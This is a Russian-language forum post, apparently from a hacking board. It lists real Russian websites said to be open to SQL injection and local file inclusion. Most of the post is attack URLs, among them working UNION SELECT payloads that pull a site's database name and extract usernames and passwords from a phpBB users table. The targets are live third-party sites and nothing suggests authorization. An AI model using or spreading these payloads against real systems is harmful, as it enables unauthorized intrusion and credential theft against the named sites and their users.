Сообщение от
Satirik
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )
Код:
http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
Думаю покапаться будет интересно
http://ckp.hut1.ru/index.php?akt=http://123
локальный инклуд
http://www.employment.ru/catalog/vi.php?pid='65
Можно покапаться
http://www.newastrakhan.ru/main.php?mode='fin
Локальный инклуд
http://adresov.net/search.php?q='
Можно покапаться
http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(databas e(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_pa ssword),5,6,7,8,9,10,11,12,13,14,15,16,17+from+php bb_users+limit+1,1/*
etc...
а инклуд на HUT'e вообще бред выкладывать =)